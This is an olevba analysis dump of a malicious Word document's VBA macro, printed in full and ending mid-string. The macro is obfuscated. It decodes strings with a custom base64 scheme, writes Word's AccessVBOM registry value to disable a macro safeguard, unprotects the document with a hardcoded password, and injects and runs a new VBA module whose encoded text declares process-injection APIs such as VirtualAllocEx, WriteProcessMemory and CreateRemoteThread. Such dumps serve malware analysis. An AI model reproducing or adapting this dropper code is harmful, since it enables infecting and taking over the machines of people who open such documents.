olevba 0.60.1 on Python 3.11.3 - http://decalage.info/python/oletools
===============================================================================
FILE: 5b81f8f1208d2dfccb4dd6946102b61ad8f220c7b1c0a80f7be3ca23e6e59b3e.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: 5b81f8f1208d2dfccb4dd6946102b61ad8f220c7b1c0a80f7be3ca23e6e59b3e.doc - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Option Explicit
Private var_mutex As Long

Private Function f_00N4FCHZ8UL() As Boolean
    Dim v0AO6WSIWI5V As String
    Dim v122UDRVGPIL() As Byte
    Dim v2UPGXD5PDZU As String
    Dim v3NXFXV5V2QT As String

    v3NXFXV5V2QT = "6F0"
    v0AO6WSIWI5V = ActiveDocument.Name
    v122UDRVGPIL = v0AO6WSIWI5V
    v2UPGXD5PDZU = f_7HJFJE21RZN(v122UDRVGPIL)

    If InStr(v2UPGXD5PDZU, v3NXFXV5V2QT) <> 0 Then
        f_00N4FCHZ8UL = False
    Else
        If ThisDocument.ReadOnly = False Then
            f_00N4FCHZ8UL = True
        Else
            f_00N4FCHZ8UL = False
        End If
    End If
End Function

Private Function f_1R9QZYR8WCU() As Boolean
    On Error GoTo l0Q2QOFBPW3E
    Dim v0XUQOXAK8DF As Object

    Set v0XUQOXAK8DF = ThisDocument.VBProject.VBComponents
    f_1R9QZYR8WCU = True
    Exit Function
l0Q2QOFBPW3E:
        f_1R9QZYR8WCU = False
End Function

Private Sub f_2170RZWX3YG(v0C4TFSOO3G6 As Integer)
    Dim v03W3HVACAJ6 As Object
    Dim v1F4PLZNJABO As String
    Dim v2QS29FWKZSR As String
    Dim v3J029XWPOJQ As String
    Dim v4C828FXUCAQ As String
    Dim v55G27XX000P As String
    Dim v6FEDZZ2P6NB As String

    v2QS29FWKZSR = "V1NjcmlwdC5zaGVsbA=="
    Set v03W3HVACAJ6 = CreateObject(f_65CTFAPUR76(v2QS29FWKZSR))
    v3J029XWPOJQ = "SEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XE9mZmljZVw="
    v4C828FXUCAQ = "XFdvcmRcU2VjdXJpdHlcQWNjZXNzVkJPTQ=="
    v55G27XX000P = "UkVHX0RXT1JE"
    v1F4PLZNJABO = f_65CTFAPUR76(v3J029XWPOJQ) & Application.Version & f_65CTFAPUR76(v4C828FXUCAQ)

    v03W3HVACAJ6.RegWrite v1F4PLZNJABO, v0C4TFSOO3G6, f_65CTFAPUR76(v55G27XX000P)
End Sub

Private Sub f_3TUMBL56RGP(v0RW26YYBDIO As String)
    Dim v02UCYZ30J4A As String
    Dim v1EC15YZLPZM As String
    Dim v2OACX04BVM8 As String
    Dim v3A0CLJZVWV5 As String

    v02UCYZ30J4A = f_65CTFAPUR76(v0RW26YYBDIO)
    v1EC15YZLPZM = ThisDocument.VBProject.VBComponents.Add(1).Name
    With ThisDocument.VBProject.VBComponents(v1EC15YZLPZM).codeModule
        .InsertLines 2, v02UCYZ30J4A
    End With
    v3A0CLJZVWV5 = "Lm1haW4="
    v2OACX04BVM8 = v1EC15YZLPZM & f_65CTFAPUR76(v3A0CLJZVWV5)

    Application.Run v2OACX04BVM8

End Sub

Private Sub f_43RX3NAVX3B()
    Dim v0IIXF5P3LUS As Paragraph
    
    For Each v0IIXF5P3LUS In ActiveDocument.Paragraphs
        With v0IIXF5P3LUS.Range
            .Font.Color = wdColorAutomatic
        End With
    Next v0IIXF5P3LUS
    
End Sub

Private Sub f_5VEIN9K5LKK()
    On Error GoTo l0ABI3SQZYBP
    Dim v0YSTWTUDSGC As String

    If Not ActiveDocument.Type = wdTypeDocument Then
        Exit Sub
    End If
    
    v0YSTWTUDSGC = "RFkdir%^fd"

    If Not ActiveDocument.ProtectionType = wdNoProtection Then
        ActiveDocument.Unprotect v0YSTWTUDSGC
    End If

l0ABI3SQZYBP:
        Exit Sub

End Sub

Private Function f_65CTFAPUR76(ByVal v0Q0Z5J3D4OI)
    Dim v0OZ6FRD7T5P As Integer
    Dim v1X25OAUBJD2 As String
    Dim v2ZZ7POP9R77 As Integer
    Dim v376PGHX293Z As Integer
    Dim v4MMAEMERZAA As Integer
    Dim v54N8SOMCPRB As String
    Dim v6AKF7EMOFH7 As Integer
    Dim v7L8SVUVO4XB
    Dim v86AVN78NBA3 As String
    Dim v92UCYZ30J4A As String
    Dim v101BP1ZJGAAF As Variant
    Dim v113XOZJVZC1Q As Integer
    Dim v12C0N82D3193 As String
    Dim v130N4FCHZ8UL As Integer
    Dim v113XOZJVZC1Q2 As Integer
    Dim v15ETYK3BT6EL As String
    Dim v1630U697KE8U As String
    Dim v1746TAAY727I As String
    Dim v18Y5W662OATY As String

    v92UCYZ30J4A = "Sieyqz4oJjwPuORBT/GLsNmfD5a3tHMKn207kvbAxQV9ZFrdIWpg1EUXlc+C8h6Y"
    v101BP1ZJGAAF = Array(39, 15, 59, 24, 53, 45, 18, 29, 48, 8, 31, 19, 30, 21, 13, 11, 41, 14, 0, 16, 54, 42, 49, 55, 63, 44, 26, 38, 57, 47, 2, 23, 51, 61, 1, 9, 36, 56, 22, 32, 7, 50, 4, 46, 20, 28, 12, 37, 10, 40, 3, 5, 34, 52, 33, 27, 6, 25, 62, 35, 60, 43, 58, 17)

    For v113XOZJVZC1Q = 0 To UBound(v101BP1ZJGAAF)
        v1630U697KE8U = v1630U697KE8U + Mid(v92UCYZ30J4A, v101BP1ZJGAAF(v113XOZJVZC1Q) + 1, 1)
    Next

    v0OZ6FRD7T5P = Len(v0Q0Z5J3D4OI)
    If v0OZ6FRD7T5P Mod 4 <> 0 Then
        Exit Function
    End If

    For v2ZZ7POP9R77 = 1 To v0OZ6FRD7T5P Step 4
        
        v376PGHX293Z = 3
        v7L8SVUVO4XB = 0

        For v4MMAEMERZAA = 0 To 3
            v54N8SOMCPRB = Mid(v0Q0Z5J3D4OI, v2ZZ7POP9R77 + v4MMAEMERZAA, 1)
            If v54N8SOMCPRB = "=" Then
                v376PGHX293Z = v376PGHX293Z - 1
                v6AKF7EMOFH7 = 0
            Else
                v6AKF7EMOFH7 = InStr(1, v1630U697KE8U, v54N8SOMCPRB, 0) - 1
            End If
            If v6AKF7EMOFH7 = -1 Then
                Exit Function
            End If

            v7L8SVUVO4XB = 64 * v7L8SVUVO4XB + v6AKF7EMOFH7
        Next

        v7L8SVUVO4XB = Hex(v7L8SVUVO4XB)
        v7L8SVUVO4XB = String(6 - Len(v7L8SVUVO4XB), "0") & v7L8SVUVO4XB
        
        v1746TAAY727I = "&" & Mid(v1630U697KE8U, 8, 1)
        v86AVN78NBA3 = Chr(v1746TAAY727I & Mid(v7L8SVUVO4XB, 1, 2))
        v12C0N82D3193 = v1746TAAY727I & Mid(v7L8SVUVO4XB, 3, 2)
        v18Y5W662OATY = Chr(v12C0N82D3193)
        v86AVN78NBA3 = v86AVN78NBA3 + v18Y5W662OATY
        v12C0N82D3193 = v1746TAAY727I & Mid(v7L8SVUVO4XB, 5, 2)
        v18Y5W662OATY = Chr(v12C0N82D3193)
        v86AVN78NBA3 = v86AVN78NBA3 + v18Y5W662OATY
        
        v1X25OAUBJD2 = v1X25OAUBJD2 & Left(v86AVN78NBA3, v376PGHX293Z)
    Next

    f_65CTFAPUR76 = v1X25OAUBJD2
End Function

Private Function f_7HJFJE21RZN(ByRef v0STV07NQBBK() As Byte) As String
    Dim v0QS29FWKZSR As Long
    Dim v1XBN32NRPRD As String
    Dim v2S41IGETDR3 As String
    For v0QS29FWKZSR = LBound(v0STV07NQBBK) To UBound(v0STV07NQBBK)
        v2S41IGETDR3 = Hex$(v0STV07NQBBK(v0QS29FWKZSR))
        v1XBN32NRPRD = v1XBN32NRPRD & v2S41IGETDR3
    Next v0QS29FWKZSR

    f_7HJFJE21RZN = v1XBN32NRPRD
End Function

Private Function f_8T24QDYNXU0() As String
    Dim v06754B1BKV6 As String
    
        v06754B1BKV6 = v06754B1BKV6 & "T3B0aW9uIEV4cGxpY2l0DQojSWYgVkJBNyBUaGVuDQogICAgUH"
    v06754B1BKV6 = v06754B1BKV6 & "JpdmF0ZSBEZWNsYXJlIFB0clNhZmUgRnVuY3Rpb24gVmlydHVh"
    v06754B1BKV6 = v06754B1BKV6 & "bEFsbG9jRXggTGliICJrZXJuZWwzMiIgKEJ5VmFsIGhQcm9jZX"
    v06754B1BKV6 = v06754B1BKV6 & "NzIEFzIExvbmdQdHIsIGxwQWRkcmVzcyBBcyBBbnksIEJ5VmFs"
    v06754B1BKV6 = v06754B1BKV6 & "IGR3U2l6ZSBBcyBMb25nLCBCeVZhbCBmbEFsbG9jYXRpb25UeX"
    v06754B1BKV6 = v06754B1BKV6 & "BlIEFzIExvbmcsIEJ5VmFsIGZsUHJvdGVjdCBBcyBMb25nKSBB"
    v06754B1BKV6 = v06754B1BKV6 & "cyBMb25nUHRyDQogICAgUHJpdmF0ZSBEZWNsYXJlIFB0clNhZm"
    v06754B1BKV6 = v06754B1BKV6 & "UgRnVuY3Rpb24gV3JpdGVQcm9jZXNzTWVtb3J5IExpYiAia2Vy"
    v06754B1BKV6 = v06754B1BKV6 & "bmVsMzIiIChCeVZhbCBoUHJvY2VzcyBBcyBMb25nUHRyLCBCeV"
    v06754B1BKV6 = v06754B1BKV6 & "ZhbCBscEJhc2VBZGRyZXNzIEFzIEFueSwgbHBCdWZmZXIgQXMg"
    v06754B1BKV6 = v06754B1BKV6 & "QW55LCBCeVZhbCBuU2l6ZSBBcyBMb25nUHRyLCBscE51bWJlck"
    v06754B1BKV6 = v06754B1BKV6 & "9mQnl0ZXNXcml0dGVuIEFzIExvbmcpIEFzIExvbmcNCiAgICBQ"
    v06754B1BKV6 = v06754B1BKV6 & "cml2YXRlIERlY2xhcmUgUHRyU2FmZSBGdW5jdGlvbiBDbG9zZU"
    v06754B1BKV6 = v06754B1BKV6 & "hhbmRsZSBMaWIgImtlcm5lbDMyIiAoQnlWYWwgaE9iamVjdCBB"
    v06754B1BKV6 = v06754B1BKV6 & "cyBMb25nUHRyKSBBcyBMb25nUHRyDQogICAgUHJpdmF0ZSBEZW"
    v06754B1BKV6 = v06754B1BKV6 & "NsYXJlIFB0clNhZmUgRnVuY3Rpb24gT3BlblByb2Nlc3MgTGli"
    v06754B1BKV6 = v06754B1BKV6 & "ICJrZXJuZWwzMiIgKEJ5VmFsIGR3RGVzaXJlZEFjY2VzcyBBcy"
    v06754B1BKV6 = v06754B1BKV6 & "BMb25nLCBCeVZhbCBiSW5oZXJpdEhhbmRsZSBBcyBMb25nLCBC"
    v06754B1BKV6 = v06754B1BKV6 & "eVZhbCBkd1Byb2Nlc3NJRCBBcyBMb25nKSBBcyBMb25nUHRyDQ"
    v06754B1BKV6 = v06754B1BKV6 & "ogICAgUHJpdmF0ZSBEZWNsYXJlIFB0clNhZmUgRnVuY3Rpb24g"
    v06754B1BKV6 = v06754B1BKV6 & "UnRsTW92ZU1lbW9yeSBMaWIgImtlcm5lbDMyIiAoQnlWYWwgRG"
    v06754B1BKV6 = v06754B1BKV6 & "tobnN6b2wgQXMgTG9uZ1B0ciwgQnlSZWYgV3dndGd5IEFzIEFu"
    v06754B1BKV6 = v06754B1BKV6 & "eSwgQnlWYWwgSHJrbXVvcyBBcyBMb25nUHRyKSBBcyBMb25nDQ"
    v06754B1BKV6 = v06754B1BKV6 & "ogICAgUHJpdmF0ZSBEZWNsYXJlIFB0clNhZmUgRnVuY3Rpb24g"
    v06754B1BKV6 = v06754B1BKV6 & "Q3JlYXRlUmVtb3RlVGhyZWFkIExpYiAia2VybmVsMzIiIChCeV"
    v06754B1BKV6 = v06754B1BKV6 & "ZhbCBoUHJvY2VzcyBBcyBMb25nUHRyLCBscFRocmVhZEF0dHJp"
    v06754B1BKV6 = v06754B1BKV6 & "YnV0ZXMgQXMgQW55LCBCeVZhbCBkd1N0YWNrU2l6ZSBBcyBMb2"
    v06754B1BKV6 = v06754B1BKV6 & "5nUHRyLCBCeVZhbCBscFN0YXJ0QWRkcmVzcyBBcyBMb25nUHRy"
    v06754B1BKV6 = v06754B1BKV6 & "LCBscFBhcmFtZXRlciBBcyBBbnksIEJ5VmFsIGR3Q3JlYXRpb2"
    v06754B1BKV6 = v06754B1BKV6 & "5GbGFncyBBcyBMb25nUHRyLCBscFRocmVhZElEIEFzIExvbmcp"
    v06754B1BKV6 = v06754B1BKV6 & "IEFzIExvbmcNCiAgICBQcml2YXRlIERlY2xhcmUgUHRyU2FmZS"
    v06754B1BKV6 = v06754B1BKV6 & "BGdW5jdGlvbiBHbG9iYWxBbGxvYyBMaWIgImtlcm5lbDMyIiAo"
    v06754B1BKV6 = v06754B1BKV6 & "QnlWYWwgd0ZsYWdzIEFzIExvbmdQdHIsIEJ5VmFsIGR3Qnl0ZX"
    v06754B1BKV6 = v06754B1BKV6 & "MgQXMgTG9uZ1B0cikgQXMgTG9uZ1B0cg0KICAgIFByaXZhdGUg"
    v06754B1BKV6 = v06754B1BKV6 & "RGVjbGFyZSBQdHJTYWZlIEZ1bmN0aW9uIEdsb2JhbEZyZWUgTG"
    v06754B1BKV6 = v06754B1BKV6 & "liICJrZXJuZWwzMiIgKEJ5VmFsIGhNZW0gQXMgTG9uZ1B0cikg"
    v06754B1BKV6 = v06754B1BKV6 & "QXMgTG9uZ1B0cg0KICAgIFByaXZhdGUgRGVjbGFyZSBQdHJTYW"
    v06754B1BKV6 = v06754B1BKV6 & "ZlIEZ1bmN0aW9uIENyZWF0ZVByb2Nlc3NBIExpYiAia2VybmVs"
    v06754B1BKV6 = v06754B1BKV6 & "MzIiIChCeVZhbCBscEFwcGxpY2F0aW9uTmFtZSBBcyBMb25nLC"
    v06754B1BKV6 = v06754B1BKV6 & "BCeVZhbCBscENvbW1hbmRMaW5lIEFzIFN0cmluZywgQnlWYWwg"
    v06754B1BKV6 = v06754B1BKV6 & "bHBQcm9jZXNzQXR0cmlidXRlcyBBcyBMb25nLCBCeVZhbCBscF"
    v06754B1BKV6 = v06754B1BKV6 & "RocmVhZEF0dHJpYnV0ZXMgQXMgTG9uZywgQnlWYWwgYkluaGVy"
    v06754B1BKV6 = v06754B1BKV6 & "aXRIYW5kbGVzIEFzIExvbmcsIEJ5VmFsIGR3Q3JlYXRpb25GbG"
    v06754B1BKV6 = v06754B1BKV6 & "FncyBBcyBMb25nLCBCeVZhbCBscEVudmlyb25tZW50IEFzIExv"
    v06754B1BKV6 = v06754B1BKV6 & "bmcsIEJ5VmFsIGxwQ3VycmVudERpcmVjdG9yeSBBcyBMb25nLC"
    v06754B1BKV6 = v06754B1BKV6 & "BscFN0YXJ0dXBJbmZvIEFzIFNUQVJUVVBJTkZPLCBscFByb2Nl"
    v06754B1BKV6 = v06754B1BKV6 & "c3NJbmZvcm1hdGlvbiBBcyBQUk9DRVNTX0lORk9STUFUSU9OKS"
    v06754B1BKV6 = v06754B1BKV6 & "BBcyBMb25nUHRyDQogICAgUHJpdmF0ZSBEZWNsYXJlIFB0clNh"
    v06754B1BKV6 = v06754B1BKV6 & "ZmUgRnVuY3Rpb24gUnRsQ3JlYXRlVXNlclRocmVhZCBMaWIgIm"
    v06754B1BKV6 = v06754B1BKV6 & "50ZGxsLmRsbCIgKEJ5VmFsIGhQcm9jZXNzIEFzIExvbmdQdHIs"
    v06754B1BKV6 = v06754B1BKV6 & "IEJ5UmVmIFRocmVhZFNlY3VyaXR5RGVzY3JpcHRvciBBcyBBbn"
    v06754B1BKV6 = v06754B1BKV6 & "ksIEJ5VmFsIENyZWF0ZVN1c3BlbmRlZCBBcyBMb25nUHRyLCBC"
    v06754B1BKV6 = v06754B1BKV6 & "eVZhbCBaZXJvQml0cyBBcyBMb25nUHRyLCBCeVZhbCBNYXhpbX"
    v06754B1BKV6 = v06754B1BKV6 & "VtU3RhY2tTaXplIEFzIExvbmdQdHIsICBCeVZhbCBDb21taXR0"
    v06754B1BKV6 = v06754B1BKV6 & "ZWRTdGFja1NpemUgQXMgTG9uZ1B0ciwgQnlWYWwgU3RhcnRBZG"
    v06754B1BKV6 = v06754B1BKV6 & "RyZXNzIEFzIExvbmdQdHIsIEJ5VmFsIFBhcmFtZXRlciBBcyBM"
    v06754B1BKV6 = v06754B1BKV6 & "b25nUHRyLCBCeVJlZiBoVGhyZWFkIEFzIExvbmdQdHIsIEJ5Um"
    v06754B1BKV6 = v06754B1BKV6 & "VmIENsaWVudElkIEFzIExvbmcpIGFzIExvbmcNCiAgICBQcml2"
    v06754B1BKV6 = v06754B1BKV6 & "YXRlIERlY2xhcmUgUHRyU2FmZSBGdW5jdGlvbiBDcmVhdGVUaH"
    v06754B1BKV6 = v06754B1BKV6 & "JlYWQgTGliICJrZXJuZWwzMiIgKEJ5VmFsIFpvcHF2IEFzIExv"
    v06754B1BKV6 = v06754B1BKV6 & "bmcsIEJ5VmFsIFhoeGkgQXMgTG9uZywgQnlWYWwgTXFueW5mYi"
    v06754B1BKV6 = v06754B1BKV6 & "BBcyBMb25nUHRyLCBUZmUgQXMgTG9uZywgQnlWYWwgWnVrYXgg"
    v06754B1BKV6 = v06754B1BKV6 & "QXMgTG9uZywgUmxlcmUgQXMgTG9uZykgQXMgTG9uZ1B0cg0KIC"
    v06754B1BKV6 = v06754B1BKV6 & "AgIFByaXZhdGUgRGVjbGFyZSBQdHJTYWZlIEZ1bmN0aW9uIFZp"
    v06754B1BKV6 = v06754B1BKV6 & "cnR1YWxBbGxvYyBMaWIgImtlcm5lbDMyIiAoQnlWYWwgWHdsIE"
    v06754B1BKV6 = v06754B1BKV6 & "FzIExvbmcsIEJ5VmFsIFNzdGpsdHVhcyBBcyBMb25nLCBCeVZh"
    v06754B1BKV6 = v06754B1BKV6 & "bCBCbnlsdGp3IEFzIExvbmcsIEJ5VmFsIFJzbyBBcyBMb25nKS"
    v06754B1BKV6 = v06754B1BKV6 & "BBcyBMb25nUHRyDQogICAgUHJpdmF0ZSBEZWNsYXJlIFB0clNh"
    v06754B1BKV6 = v06754B1BKV6 & "ZmUgRnVuY3Rpb24gRGlzcENhbGxGdW5jIExpYiAiT2xlQXV0Mz"
    v06754B1BKV6 = v06754B1BKV6 & "IuZGxsIiAoQnlWYWwgcHZJbnN0YW5jZSBBcyBMb25nUHRyLCBC"
    v06754B1BKV6 = v06754B1BKV6 & "eVZhbCBvVmZ0IEFzIExvbmdQdHIsIEJ5VmFsIGNjIEFzIExvbm"
    v06754B1BKV6 = v06754B1BKV6 & "csIEJ5VmFsIHZ0UmV0dXJuIEFzIEludGVnZXIsIEJ5VmFsIGNB"
    v06754B1BKV6 = v06754B1BKV6 & "Y3R1YWxzIEFzIExvbmcsIEJ5UmVmIHByZ3Z0IEFzIEludGVnZX"
    v06754B1BKV6 = v06754B1BKV6 & "IsIEJ5UmVmIHByZ3B2YXJnIEFzIExvbmdQdHIsIEJ5UmVmIHB2"
    v06754B1BKV6 = v06754B1BKV6 & "YXJnUmVzdWx0IEFzIFZhcmlhbnQpIEFzIExvbmcNCg0KICAgIF"
    v06754B1BKV6 = v06754B1BKV6 & "ByaXZhdGUgRGVjbGFyZSBQdHJTYWZlIEZ1bmN0aW9uIExvYWRM"
    v06754B1BKV6 = v06754B1BKV6 & "aWJyYXJ5IExpYiAia2VybmVsMzIiIEFsaWFzICJMb2FkTGlicm"
    v06754B1BKV6 = v06754B1BKV6 & "FyeUEiIChCeVZhbCBscExpYkZpbGVOYW1lIEFzIFN0cmluZykg"
    v06754B1BKV6 = v06754B1BKV6 & "QXMgTG9uZ1B0cg0KICAgIFByaXZhdGUgRGVjbGFyZSBQdHJTYW"
    v06754B1BKV6 = v06754B1BKV6 & "ZlIEZ1bmN0aW9uIEdldFByb2NBZGRyZXNzIExpYiAia2VybmVs"
    v06754B1BKV6 = v06754B1BKV6 & "MzIiIChCeVZhbCBoTW9kdWxlIEFzIExvbmdQdHIsIEJ5VmFsIG"
    v06754B1BKV6 = v06754B1BKV6 & "xwUHJvY05hbWUgQXMgU3RyaW5nKSBBcyBMb25nUHRyDQojRWxz"
    v06754B1BKV6 = v06754B1BKV6 & "ZQ0KICAgIFByaXZhdGUgRGVjbGFyZSBGdW5jdGlvbiBWaXJ0dW"
    v06754B1BKV6 = v06754B1BKV6 & "FsQWxsb2NFeCBMaWIgImtlcm5lbDMyIiAoQnlWYWwgaFByb2Nl"
    v06754B1BKV6 = v06754B1BKV6 & "c3MgQXMgTG9uZywgbHBBZGRyZXNzIEFzIEFueSwgQnlWYWwgZH"
    v06754B1BKV6 = v06754B1BKV6 & "dTaXplIEFzIExvbmcsIEJ5VmFsIGZsQWxsb2NhdGlvblR5cGUg"
    v06754B1BKV6 = v06754B1BKV6 & "QXMgTG9uZywgQnlWYWwgZmxQcm90ZWN0IEFzIExvbmcpIEFzIE"
    v06754B1BKV6 = v06754B1BKV6 & "xvbmdQdHINCiAgICBQcml2YXRlIERlY2xhcmUgRnVuY3Rpb24g"
    v06754B1BKV6 = v06754B1BKV6 & "V3JpdGVQcm9jZXNzTWVtb3J5IExpYiAia2VybmVsMzIiIChCeV"
    v06754B1BKV6 = v06754B1BKV6 & "ZhbCBoUHJvY2VzcyBBcyBMb25nLCBCeVZhbCBscEJhc2VBZGRy"
    v06754B1BKV6 = v06754B1BKV6 & "ZXNzIEFzIEFueSwgbHBCdWZmZXIgQXMgQW55LCBCeVZhbCBuU2"
    v06754B1BKV6 = v06754B1BKV6 & "l6ZSBBcyBMb25nLCBscE51bWJlck9mQnl0ZXNXcml0dGVuIEFz"
    v06754B1BKV6 = v06754B1BKV6 & "IExvbmcpIEFzIExvbmcNCiAgICBQcml2YXRlIERlY2xhcmUgRn"
    v06754B1BKV6 = v06754B1BKV6 & "VuY3Rpb24gQ2xvc2VIYW5kbGUgTGliICJrZXJuZWwzMiIgKEJ5"
    v06754B1BKV6 = v06754B1BKV6 & "VmFsIGhPYmplY3QgQXMgTG9uZykgQXMgTG9uZw0KICAgIFByaX"
    v06754B1BKV6 = v06754B1BKV6 & "ZhdGUgRGVjbGFyZSBGdW5jdGlvbiBPcGVuUHJvY2VzcyBMaWIg"
    v06754B1BKV6 = v06754B1BKV6 & "Imtlcm5lbDMyIiAoQnlWYWwgZHdEZXNpcmVkQWNjZXNzIEFzIE"
    v06754B1BKV6 = v06754B1BKV6 & "xvbmcsIEJ5VmFsIGJJbmhlcml0SGFuZGxlIEFzIExvbmcsIEJ5"
    v06754B1BKV6 = v06754B1BKV6 & "VmFsIGR3UHJvY2Vzc0lEIEFzIExvbmcpIEFzIExvbmcNCiAgIC"
    v06754B1BKV6 = v06754B1BKV6 & "BQcml2YXRlIERlY2xhcmUgRnVuY3Rpb24gUnRsTW92ZU1lbW9y"
    v06754B1BKV6 = v06754B1BKV6 & "eSBMaWIgImtlcm5lbDMyIiAoQnlWYWwgRGtobnN6b2wgQXMgTG"
    v06754B1BKV6 = v06754B1BKV6 & "9uZywgQnlSZWYgV3dndGd5IEFzIEFueSwgQnlWYWwgSHJrbXVv"
    v06754B1BKV6 = v06754B1BKV6 & "cyBBcyBMb25nKSBBcyBMb25nDQogICAgUHJpdmF0ZSBEZWNsYX"
    v06754B1BKV6 = v06754B1BKV6 & "JlIEZ1bmN0aW9uIENyZWF0ZVJlbW90ZVRocmVhZCBMaWIgImtl"
    v06754B1BKV6 = v06754B1BKV6 & "cm5lbDMyIiAoQnlWYWwgaFByb2Nlc3MgQXMgTG9uZywgbHBUaH"
    v06754B1BKV6 = v06754B1BKV6 & "JlYWRBdHRyaWJ1dGVzIEFzIEFueSwgQnlWYWwgZHdTdGFja1Np"
    v06754B1BKV6 = v06754B1BKV6 & "emUgQXMgTG9uZywgQnlWYWwgbHBTdGFydEFkZHJlc3MgQXMgTG"
    v06754B1BKV6 = v06754B1BKV6 & "9uZywgbHBQYXJhbWV0ZXIgQXMgQW55LCBCeVZhbCBkd0NyZWF0"
    v06754B1BKV6 = v06754B1BKV6 & "aW9uRmxhZ3MgQXMgTG9uZywgbHBUaHJlYWRJRCBBcyBMb25nKS"
    v06754B1BKV6 = v06754B1BKV6 & "BBcyBMb25nDQogICAgUHJpdmF0ZSBEZWNsYXJlIFB0clNhZmUg"
    v06754B1BKV6 = v06754B1BKV6 & "RnVuY3Rpb24gR2xvYmFsQWxsb2MgTGliICJrZXJuZWwzMiIgKE"
    v06754B1BKV6 = v06754B1BKV6 & "J5VmFsIHdGbGFncyBBcyBMb25nLCBCeVZhbCBkd0J5dGVzIEFz"
    v06754B1BKV6 = v06754B1BKV6 & "IExvbmdQdHIpIEFzIExvbmdQdHINCiAgICBQcml2YXRlIERlY2"
    v06754B1BKV6 = v06754B1BKV6 & "xhcmUgUHRyU2FmZSBGdW5jdGlvbiBHbG9iYWxGcmVlIExpYiAi"
    v06754B1BKV6 = v06754B1BKV6 & "a2VybmVsMzIiIChCeVZhbCBoTWVtIEFzIExvbmdQdHIpIEFzIE"
    v06754B1BKV6 = v06754B1BKV6 & "xvbmdQdHINCiAgICBQcml2YXRlIERlY2xhcmUgRnVuY3Rpb24g"
    v06754B1BKV6 = v06754B1BKV6 & "Q3JlYXRlUHJvY2Vzc0EgTGliICJrZXJuZWwzMiIgKEJ5VmFsIG"
    v06754B1BKV6 = v06754B1BKV6 & "xwQXBwbGljYXRpb25OYW1lIEFzIExvbmcsIEJ5VmFsIGxwQ29t"
    v06754B1BKV6 = v06754B1BKV6 & "bWFuZExpbmUgQXMgU3RyaW5nLCBCeVZhbCBscFByb2Nlc3NBdH"
    v06754B1BKV6 = v06754B1BKV6 & "RyaWJ1dGVzIEFzIExvbmcsIEJ5VmFsIGxwVGhyZWFkQXR0cmli"
    v06754B1BKV6 = v06754B1BKV6 & "dXRlcyBBcyBMb25nLCBCeVZhbCBiSW5oZXJpdEhhbmRsZXMgQX"
    v06754B1BKV6 = v06754B1BKV6 & "MgTG9uZywgQnlWYWwgZHdDcmVhdGlvbkZsYWdzIEFzIExvbmcs"
    v06754B1BKV6 = v06754B1BKV6 & "IEJ5VmFsIGxwRW52aXJvbm1lbnQgQXMgTG9uZywgQnlWYWwgbH"
    v06754B1BKV6 = v06754B1BKV6 & "BDdXJyZW50RGlyZWN0b3J5IEFzIExvbmcsIGxwU3RhcnR1cElu"
    v06754B1BKV6 = v06754B1BKV6 & "Zm8gQXMgU1RBUlRVUElORk8sIGxwUHJvY2Vzc0luZm9ybWF0aW"
    v06754B1BKV6 = v06754B1BKV6 & "9uIEFzIFBST0NFU1NfSU5GT1JNQVRJT04pIEFzIExvbmcNCiAg"
    v06754B1BKV6 = v06754B1BKV6 & "ICBQcml2YXRlIERlY2xhcmUgUHRyU2FmZSBGdW5jdGlvbiBSdG"
    v06754B1BKV6 = v06754B1BKV6 & "xDcmVhdGVVc2VyVGhyZWFkIExpYiAibnRkbGwuZGxsIiAoQnlW"
    v06754B1BKV6 = v06754B1BKV6 & "YWwgaFByb2Nlc3MgQXMgTG9uZywgbHBTZWN1cml0eURlc2NyaX"
    v06754B1BKV6 = v06754B1BKV6 & "B0b3IgQXMgQW55LCBiQ3JlYXRlU3VzcGVuZGVkIEFzIEJvb2xl"
    v06754B1BKV6 = v06754B1BKV6 & "YW4sIEJ5VmFsIGR3U3RhY2taZXJvQml0cyBBcyBMb25nLCBCeV"
    v06754B1BKV6 = v06754B1BKV6 & "ZhbCBkd1N0YWNrUmVzZXJ2ZWQgQXMgTG9uZywgQnlWYWwgZHdT"
    v06754B1BKV6 = v06754B1BKV6 & "dGFja0NvbW1pdCBBcyBMb25nLCBCeVZhbCBscFN0YXJ0QWRkcm"
    v06754B1BKV6 = v06754B1BKV6 & "VzcyBBcyBMb25nLCBscFBhcmFtZXRlciBBcyBBbnksIEJ5VmFs"
    v06754B1BKV6 = v06754B1BKV6 & "IGhUaHJlYWQgQXMgTG9uZywgbHBDbGllbnRJRCBBcyBMb25nKS"
    v06754B1BKV6 = v06754B1BKV6 & "BhcyBMb25nDQojRW5kIElmDQpQcml2YXRlIFR5cGUgU1RBUlRV"
    v06754B1BKV6 = v06754B1BKV6 & "UElORk8NCiAgICBjYiBBcyBMb25nDQogICAgbHBSZXNlcnZlZC"
    v06754B1BKV6 = v06754B1BKV6 & "BBcyBTdHJpbmcNCiAgICBscERlc2t0b3AgQXMgU3RyaW5nDQog"
    v06754B1BKV6 = v06754B1BKV6 & "ICAgbHBUaXRsZSBBcyBTdHJpbmcNCiAgICBkd1ggQXMgTG9uZw"
    v06754B1BKV6 = v06754B1BKV6 & "0KICAgIGR3WSBBcyBMb25nDQogICAgZHdYU2l6ZSBBcyBMb25n"
    v06754B1BKV6 = v06754B1BKV6 & "DQogICAgZHdZU2l6ZSBBcyBMb25nDQogICAgZHdYQ291bnRDaG"
    v06754B1BKV6 = v06754B1BKV6 & "FycyBBcyBMb25nDQogICAgZHdZQ291bnRDaGFycyBBcyBMb25n"
    v06754B1BKV6 = v06754B1BKV6 & "DQogICAgZHdGaWxsQXR0cmlidXRlIEFzIExvbmcNCiAgICBkd0"
    v06754B1BKV6 = v06754B1BKV6 & "ZsYWdzIEFzIExvbmcNCiAgICB3U2hvd1dpbmRvdyBBcyBJbnRl"
    v06754B1BKV6 = v06754B1BKV6 & "Z2VyDQogICAgY2JSZXNlcnZlZDIgQXMgSW50ZWdlcg0KICAgIG"
    v06754B1BKV6 = v06754B1BKV6 & "xwUmVzZXJ2ZWQyIEFzIExvbmcNCiAgICBoU3RkSW5wdXQgQXMg"
    v06754B1BKV6 = v06754B1BKV6 & "TG9uZw0KICAgIGhTdGRPdXRwdXQgQXMgTG9uZw0KICAgIGhTdG"
